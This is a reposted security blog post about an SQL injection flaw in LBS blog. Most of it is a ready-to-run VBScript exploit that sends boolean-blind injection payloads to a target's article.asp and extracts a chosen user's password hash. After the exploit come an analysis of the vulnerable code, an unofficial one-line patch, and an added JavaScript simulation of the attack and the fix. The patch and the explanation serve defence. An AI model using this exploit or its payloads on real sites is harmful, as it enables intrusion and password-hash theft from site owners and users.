LBS blog SQL injection vulnerability (affects all versions)

Published: 2011/11/18 23:02:56  Author: 夜风冷  Views: 1177

    This article was first published 3 years ago.
    The exploit is as follows:
    '============================================================================
    ' Usage:
    '   At a command prompt:
    '   cscript.exe lbsblog.vbs <blog path on the target site> <valid article id> <user id whose password hash to recover>
    ' Example:
    '   cscript.exe lbsblog.vbs www.xxxx.com/blog/ 1 1
    ' by loveshell.net[B.C.T]
    '============================================================================
    On Error Resume Next
    Dim oArgs
    Dim olbsXML            ' XMLHTTP object used to request the target URL
    Dim TargetURL          ' target URL
    Dim userid, articleid  ' user id whose hash is recovered, and a valid article id
    Dim TempStr            ' the part of the MD5 hash recovered so far
    Dim CharHex            ' hex alphabet
    Dim postdata           ' POST body carrying the injected condition
    Set oArgs = WScript.Arguments
    ' All three arguments are required
    If oArgs.Count < 3 Then Call ShowUsage()
    Set olbsXML = CreateObject("Microsoft.XMLHTTP")
    ' Normalise the target URL
    TargetURL = oArgs(0)
    If LCase(Left(TargetURL, 7)) <> "http://" Then TargetURL = "http://" & TargetURL
    If Right(TargetURL, 1) <> "/" Then TargetURL = TargetURL & "/"
    TargetURL = TargetURL & "article.asp"
    articleid = oArgs(1)
    userid = oArgs(2)
    TempStr = ""
    CharHex = Split("0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f", ",")
    WScript.Echo "LBS blog All version Exploit" & vbCrLf
    WScript.Echo "By 剑心" & vbCrLf
    WScript.Echo "http://www.loveshell.net/ Just For fun :)" & vbCrLf & vbCrLf
    WScript.Echo "+Fuck the site now" & vbCrLf
    Call main(TargetURL)
    Set olbsXML = Nothing
    '----------------------------------------------sub-------------------------------------------------------
    '============================================
    ' Name: main
    ' Purpose: recover the blog user's password hash one hex digit at a time
    '          through the boolean-blind injection in article.asp (act=delete)
    '============================================
    Sub main(TargetURL)
    Dim MainOffset, SubOffset, OpenURL, GetPage, Found
    ' An MD5 hex digest is 32 characters long
    For MainOffset = 1 To 32
    Found = False
    For SubOffset = 0 To 15
    ' Injected condition: true only when the first MainOffset characters of the hash equal the guess
    postdata = articleid & " and (select left(user_password," & MainOffset & ") from blog_user where user_id=" & userid & ")='" & TempStr & CharHex(SubOffset) & "'"
    OpenURL = TargetURL
    olbsXML.open "POST", OpenURL, False, "", ""
    olbsXML.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
    olbsXML.send "act=delete&id=" & Escape(postdata)
    GetPage = BytesToBstr(olbsXML.responseBody)
    If InStr(GetPage, "deleted") <> 0 Then
    ' Wrong guess: no article matched the injected condition, try the next hex digit.
    ' If the target returns different marker strings, adjust "deleted" and "permission" here.
    ElseIf InStr(GetPage, "permission") <> 0 Then
    ' Correct guess: the article was loaded and the later rights check rejected the delete
    TempStr = TempStr & CharHex(SubOffset)
    Found = True
    WScript.Echo "+Crack now:" & TempStr
    Exit For
    Else
    WScript.Echo vbCrLf & "Something error" & vbCrLf
    WScript.Echo vbCrLf & GetPage & vbCrLf
    WScript.Quit
    End If
    Next
    ' No hex digit matched at this position: stop rather than keep guessing blindly
    If Not Found Then Exit For
    Next
    WScript.Echo vbCrLf & "+We Got It:" & TempStr & vbCrLf & vbCrLf & ":P Don't Be evil"
    End Sub
    '============================================
    ' Name: BytesToBstr
    ' Purpose: convert the raw XMLHTTP response body to a GB2312 string
    '============================================
    Function BytesToBstr(body)
    Dim objstream
    Set objstream = CreateObject("ADODB.Stream")
    objstream.Type = 1      ' binary
    objstream.Mode = 3      ' read/write
    objstream.Open
    objstream.Write body
    objstream.Position = 0
    objstream.Type = 2      ' text
    objstream.Charset = "GB2312"
    BytesToBstr = objstream.ReadText
    objstream.Close
    Set objstream = Nothing
    End Function
    '============================
    ' Name: ShowUsage
    ' Purpose: print usage and exit
    '============================
    Sub ShowUsage()
    WScript.Echo " LBS blog Exploit" & vbCrLf & " By Loveshell/剑心"
    WScript.Echo "Usage:" & vbCrLf & " CScript " & WScript.ScriptFullName & " TargetURL ArticleID UserID"
    WScript.Echo "Example:" & vbCrLf & " CScript " & WScript.ScriptFullName & " http://www.loveshell.net/ 1 1"
    WScript.Echo ""
    WScript.Quit
    End Sub
    Vulnerability details:
    In src_article.asp:
    ......
    input["log_id"]=func.checkInt(input["log_id"]);
    if(!input["id"]){
    strError=lang["invalid_parameter"];
    }else{
    // Check if the article exists
    theArticle.load("log_id, log_authorID, log_catID","log_id="+input["id"]);
    strError=false;
    }
    ......
    The parameter that gets sanitized is log_id, but the one actually used in the query is id, which goes through untouched :)
    And then?
    The code in class/article.asp:
    this.load = function(strselect, strwhere){
    var tmpA=connBlog.query("select TOP 1 "+strselect+" FROM [blog_Article] where "+strwhere);
    if(tmpA){
    this.fill(tmpA[0]);
    return true;
    }else{
    return false;
    }
    }
    No need to spell the above out: strwhere, and with it the raw id parameter, is concatenated straight into the WHERE clause. Triggering it does have a precondition, though; let's see whether it can be met.
    function articledelete(){
    if(theUser.rights["delete"]<1){
    // Check User Right - without DB Query
    pageHeader(lang["error"]);
    redirectMessage(lang["error"], lang["no_rights"], lang["goback"], "javascript:window.history.back();", false, "errorbox");
    }else{
    var theArticle=new lbsArticle();
    var strError;
    By default guests have the delete right, so this check passes. Although a further check follows, the query containing the injected id has already run by then, and that later check is exactly what the exploit uses as its oracle: a response containing "permission" means the injected condition was true (the article was loaded and the rights check rejected the guest), one containing "deleted" means it was false.
    Unofficial patch for the LBS blog SQL injection vulnerability
    Open src_article.asp and find:
    input["log_id"]=func.checkInt(input["log_id"]);
    if(!input["id"]){
    strError=lang["invalid_parameter"];
    }else{
    // Check if the article exists
    theArticle.load("log_id, log_authorID, log_catID","log_id="+input["id"]);
    strError=false;
    }
    Change the line theArticle.load("log_id, log_authorID, log_catID","log_id="+input["id"]);
    to: theArticle.load("log_id, log_authorID, log_catID","log_id="+func.checkInt(input["id"])); and that's it.
    This closes the path shown above because log_id is numeric, so an integer check is a complete fix for this one line; any other place in the script that concatenates input["id"] into a query string needs the same treatment.
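The following is an added example, not code from LBS blog or from the exploit author. It models in JavaScript the two code paths in src_article.asp discussed above (the raw input["id"] concatenated into the WHERE clause, and the patched path through an integer check) and runs the same boolean-blind extraction the VBScript exploit performs, against an in-memory stand-in for the blog_Article and blog_user tables. checkIntAssumed is an assumed implementation standing in for LBS's func.checkInt, queryArticle is a stand-in for connBlog.query that understands only the WHERE shapes this page produces, deleteResponse mimics the "permission"/"deleted" responses the exploit keys on, and the password hash is a constructed sample value.

```javascript
// Added example: models the vulnerable and patched WHERE-clause construction from
// src_article.asp and the blind extraction loop of the exploit. Not LBS blog code.

// Constructed sample rows standing in for blog_Article and blog_user.
const blogArticle = [{ log_id: 1, log_authorID: 1, log_catID: 1 }];
const blogUser = [{ user_id: 1, user_password: "5f4dcc3b5aa765d61d8327deb882cf99" }]; // constructed sample hash

// Assumed stand-in for func.checkInt: accept only a decimal integer, otherwise 0.
function checkIntAssumed(value) {
  return /^\d+$/.test(String(value)) ? parseInt(value, 10) : 0;
}

// The vulnerable line: input["id"] lands in the WHERE clause untouched.
function buildWhereVulnerable(input) {
  return "log_id=" + input.id;
}

// The patched line: input["id"] is coerced to an integer first.
function buildWherePatched(input) {
  return "log_id=" + checkIntAssumed(input.id);
}

// Stand-in for connBlog.query("select TOP 1 ... FROM [blog_Article] where " + strwhere).
// It evaluates exactly the two WHERE shapes this page produces:
//   log_id=<n>
//   log_id=<n> and (select left(user_password,<k>) from blog_user where user_id=<u>)='<prefix>'
// and throws on anything else, the way a real database rejects a malformed clause.
const WHERE_RE = /^log_id=(\d+)(?: and \(select left\(user_password,(\d+)\) from blog_user where user_id=(\d+)\)='([0-9a-f]*)')?$/;
function queryArticle(strwhere) {
  const m = WHERE_RE.exec(strwhere);
  if (!m) throw new Error("syntax error near: " + strwhere);
  const article = blogArticle.find((a) => a.log_id === Number(m[1]));
  if (!article) return null;
  if (m[2] === undefined) return article; // plain lookup, no subselect
  const user = blogUser.find((u) => u.user_id === Number(m[3]));
  const cond = !!user && user.user_password.slice(0, Number(m[2])) === m[4];
  return cond ? article : null; // the boolean oracle: row or no row
}

// Server-side handling of act=delete as the exploit sees it: "permission" when a row
// was loaded (the later rights check rejects a guest), "deleted" when nothing was loaded.
function deleteResponse(buildWhere, id) {
  return queryArticle(buildWhere({ id })) !== null ? "no permission" : "article deleted";
}

// The exploit's loop: one hex digit of the hash per position, at most 16 requests each.
function extractHash(buildWhere, articleId, userId, hashLength = 32) {
  let recovered = "";
  let requests = 0;
  for (let pos = 1; pos <= hashLength; pos++) {
    let matched = false;
    for (const c of "0123456789abcdef") {
      const payload = articleId + " and (select left(user_password," + pos +
        ") from blog_user where user_id=" + userId + ")='" + recovered + c + "'";
      requests++;
      if (deleteResponse(buildWhere, payload).indexOf("permission") !== -1) {
        recovered += c;
        matched = true;
        break;
      }
    }
    if (!matched) break; // no digit matched: nothing more to learn at this position
  }
  return { hash: recovered, requests };
}
```

Calling extractHash(buildWhereVulnerable, 1, 1) recovers the whole 32-character hash in at most 512 requests, exactly as the VBScript loop does. With buildWherePatched the same payload is reduced to "log_id=0", no row is ever loaded, every response reads "deleted", and the loop gives up after the first 16 requests with nothing recovered; a plain numeric id still loads the article as before.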
    As is customary, the source of this article: original author 脚本小子
    Source: the Internet
    Reposted by: ㊣ 夜 風 冷
    
